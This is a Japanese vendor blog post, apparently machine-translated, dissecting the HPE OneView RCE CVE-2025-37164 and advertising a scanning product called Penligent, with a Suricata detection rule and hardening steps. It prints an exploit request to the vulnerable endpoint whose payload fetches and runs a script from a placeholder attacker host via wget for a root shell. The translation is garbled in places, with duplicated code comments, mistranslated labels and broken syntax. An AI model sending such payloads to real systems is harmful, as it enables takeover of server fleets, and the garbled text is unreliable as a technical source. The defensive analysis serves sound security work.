シリコンの乗っ取り：CVE-2025-37164（HPE OneView）の検死とAIコンピュート・セキュリティの崩壊

コンピュートが新しい石油となる」2026年の急成長時代において、物理データセンターのセキュリティはかつてないほど重要になっている。レッドチームがLLMのガードレールを迂回するために何週間もかけてプロンプト・インジェクションを作成する一方で、ITスタックの地下からははるかに原始的で壊滅的な脅威が出現している。

2025年12月16日、セキュリティー界は次のような情報開示に揺れた。 CVE-2025-37164の脆弱性である。 HPE OneView 稀に見る恐ろしい CVSSスコア10.0.

HPE OneViewは、最新のSoftware-Defined Infrastructure（SDI）の「神モード」ソフトウェアである。何千台ものHPE SynergyサーバーとProLiantサーバーのプロビジョニングを自動化する。

CVE-2025-37164 は 認証されていないリモートコード実行(RCE) の脆弱性がある。この脆弱性により、管理ポートにネットワークアクセスできる攻撃者であれば誰でも、rootとして任意のシステムコマンドを実行できるようになり、事実上、物理的な艦隊全体への鍵を渡してしまうことになる。この記事では、ハイレベルな要約をやめて、APIの不具合とAIセキュリティ・エンジニアリングへの影響について外科的に解剖する。

神モード」脆弱性のアーキテクチャ

この欠陥の重大さを理解するには、OneViewの役割を理解する必要がある。BMC（ベースボード管理コントローラー）とiLO（統合ライトアウト）インターフェースの上に位置し、コンピュート、ストレージ、ネットワークファブリックの制御を集約する。

脆弱性は特定のREST APIエンドポイントに存在する： /rest/id-pools/executeCommand.

1.コンフィギュレーションの大惨事

セキュアなAPI設計では、システムコマンドを実行可能なエンドポイントは、複数のレイヤーによって保護されるべきである：認証（OAuth/Session）、認可（RBAC）、入力サニタイゼーション。

影響を受ける OneView のバージョン (11.0 より前のバージョン) では、エンドポイント定義で 実行コマンド は壊滅的なコンフィギュレーション・エラーに見舞われた。内部のセキュリティ・フィルター・マップはこのルートに auth-type：NO_AUTH.

仮想バックエンドロジック（Java/Spring擬似コード）：

ジャワ

`@RestController @RequestMapping("/rest/id-pools") public class IdPoolController {.

// FATAL FLAW: @PreAuthorize("isAuthenticated()") が見つからない。
// このエンドポイントは、おそらく内部的なサービス間通信を意図したものでしょう。
// しかし、パブリック・インターフェースに公開されていた。
このエンドポイントは、おそらく内部的なサービス間通信を目的としていましたが、 // 公開インタフェースとして公開されました。
public ResponseEntity execute(@RequestBody CommandRequest payload) { // このエンドポイントは、サービス間の内部通信を想定していたと思われますが、 // 公開インターフェースとして公開されていました。
    
    文字列バイナリ = payload.getCommand()；
    String[] args = payload.getArgs()；
    
    // FATAL FLAW: サニタイズせずに ProcessBuilder に直接インジェクションする。
    ProcessBuilder pb = new ProcessBuilder(binary)；
    pb.command().addAll(Arrays.asList(args))；
    プロセス process = pb.start()；
    
    return ResponseEntity.ok(readOutput(process))；
}

}`

このロジックは、HTTPリクエストからアプライアンスのLinuxカーネルに直接トンネルを作る。

2.キル・チェーンの解体

エクスプロイトの複雑さは 低い.マッサージするメモリ破壊も、バイパスするASLRも、勝つためのレース条件もない。これは純粋で単純な論理的欠陥なのだ。

エクスプロイト・プリミティブ

攻撃者はPUTリクエストを送信する。ペイロードは実行するコマンドを定義するJSONオブジェクトである。

HTTP

HTTP/1.1 ホスト: oneview-appliance.local Content-Type: application/json

{ "command"："/bin/sh", "args"：["-c", "wget http://c2.attacker.com/payload.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x"]] 。}`

結果

アプライアンスがスクリプトを実行する。攻撃者はroot権限を持つリバースシェルを受け取る。ここから、攻撃者はネットワークコントローラ自体に永続性を持つようになります。

AIインフラの脅威の状況

なぜこれが「ハードコアAIセキュリティ・エンジニア」に特有なのか？なぜなら、AIのインフラはこの種の攻撃に対して独特に脆弱だからだ。

1.GPU強盗（暗号ジャックと窃盗）

AIトレーニングクラスタはH100/B200 GPUを利用しており、これは非常に貴重なものです。OneViewにrootアクセスした攻撃者は、以下のことが可能です：

• 不正なワークロードの提供： 暗号通貨を採掘するためにベアメタル上で隠れたVMをスピンアップし、メガワットの電力と冷却能力を吸い上げる。
• リソース拒否： 何百万ドルもかかるかもしれない）重要なトレーニング中に、攻撃者は 電源オフ コマンドをiLOインターフェイス経由で物理ブレードに送信するため、壊滅的なデータ損失とプロジェクトの遅延が発生する。

2.ファームウェアによるサプライチェーン汚染

OneView は、サーバー群のファームウェア・アップデートを管理する。root 権限を持つ攻撃者は以下のことが可能です：

• 悪意のあるファームウェアをフラッシュする： BIOS/UEFIを脆弱なバージョンにダウングレードしたり、永続的なルートキット（以下のようなもの）を埋め込んだりする。 ブラックロータス)をAIサーバーのSPIフラッシュに挿入する。
• 永続的なアクセス： OSをワイプして再インストールしても、マルウェアはハードウェアの中に生き残り、そのマシンで訓練された将来のすべてのモデルを危険にさらす。

3.データレイクへの横の動き

高性能AIクラスタは、ストレージ・ファブリック（Infiniband/RoCE）と緊密に結合しています。OneViewはこれらの接続を管理します。OneViewを侵害すると、攻撃者は基盤となるNAS/SANボリュームをマウントできるようになり、企業のADネットワークに触れることなく、独自のデータセットやモデルウェイトに直接アクセスできるようになります。

AIを活用したディフェンス過失の優位性

CVE-2025-37164のようなインフラ脆弱性の検出は、従来のウェブ・アプリケーション・スキャナー（DAST）の盲点だった。DASTツールはHTMLをクロールしますが、非標準ポートの不明瞭な管理APIを調査することはほとんどありません。

そこで ペンリジェント は、インフラ・セキュリティのパラダイム・シフトを意味する。

1.帯域外（OOB）資産マッピング

ペンリジェントのAIエージェントは、次のような特徴を備えています。 フルスタック・アセット・マッピング.Webアプリケーションをスキャンするだけでなく、管理プロトコルのシグネチャ（IPMI、Redfish、HPE REST API）を積極的にリッスンします。AIはこれらのシグネチャを最新の脅威インテリジェンスと関連付け、IT部門がパッチを当て忘れた「シャドーインフラ」を特定します。

2.非破壊RCE検証

本番AIクラスタをスキャンするのはリスクが高い。スキャンを誤るとサーバーがクラッシュする可能性があります。Penligentは コンテキスト・アウェア・ファジング 非破壊検証を行う。

• 安全なペイロード を送る代わりに rm -rf / のような良性のペイロードを送信する。 echo "Penligent_Check".
• 検証： AI は HTTP レスポンスを分析する。もしエコーされた文字列が見つかれば、100%の確度でRCEを確認し、セキュリティチームはトレーニングのジョブをクラッシュさせることなく、パッチの優先順位を決めることができます。

ブルーチーム・ハンドブック検知とハード化

すぐにパッチを当てることができない場合は、「違反が想定される」状態である。

1.ネットワーク検出（Suricata/Snort）

OneView 管理サブネットへのトラフィックを監視します。HTTP プット または ポスト リクエスト /rest/id-pools/executeCommand.

スリカータ・ルール

ヤムル

alert http $EXTERNAL_NET any -> $ONEVIEW_SERVER 443 (msg: "ET EXPLOIT HPE OneView CVE-2025-37164 RCE Attempt"; ﹑ flow:established,to_server; ﹑ content："/rest/id-pools/executeCommand"; http_uri; ୧ content: "command"; http_client_body; ୧ content:"/bin/"; http_client_body; ୧ classtype:attempted-admin; sid:1000025; rev:1;)

2.ログ監査

OneView 監査ログ (ci-debug.ログ または 監査ログへの予期せぬ呼び出しのため)。 Idプール コントローラは、指定された Bastion Host ではない IP アドレスから発信されている。

3.建築検疫

• 管理VLAN： OneView アプライアンス・インターフェイスが厳密に隔離された VLAN 上にあり、MFA 付きの VPN 経由でのみアクセスできることを確認します。
• ACL： スイッチ・レベルでアクセス制御リストを適用して、システム管理者のワークステーションの特定の IP 以外、OneView アプライアンスのポート 443 へのすべてのトラフィックをブロックします。

結論

CVE-2025-37164 クラウド」は他人のコンピューターに過ぎず、そのコンピューターには管理ポートがあるということを残酷なまでに思い知らされる。AGIの構築を急ぐあまり、その土台となる具体的な土台をないがしろにしてはならない。

AIの未来のセキュリティは、堅牢なモデル・アライメントだけでなく、シリコンのサプライ・チェーンの完全性にかかっている。ファームウェアをアップグレードし、管理プレーンを分離し、インテリジェントで自動化された検証を採用して、「ゴッドモード」コンソールが攻撃者の遊び場にならないようにしましょう。

信頼できるリファレンス

• HPE セキュリティ情報HPESBGN04770 (CVE-2025-37164)
• CVE-2025-37164 に関する NIST NVD の詳細
• CISA既知の悪用される脆弱性カタログ
• Rapid7 による分析：HPE OneView に影響を及ぼす重大な未認証 RCE

🚀 CTAオプション

オプション1（ペインポイント - 推奨）：

DASTスキャナは管理APIが見えない？Penligentは違います。

インフラを無視するのはやめましょう。今すぐPenligentでAIコンピュートクラスタの隠れたRCEを検出しましょう。

オプション2（緊急）：

ゴッドモード」のバグでAIモデルが消えてしまわないように。

Penligentの非破壊検査により、HPE OneViewのセキュリティ体制を即座に検証できます。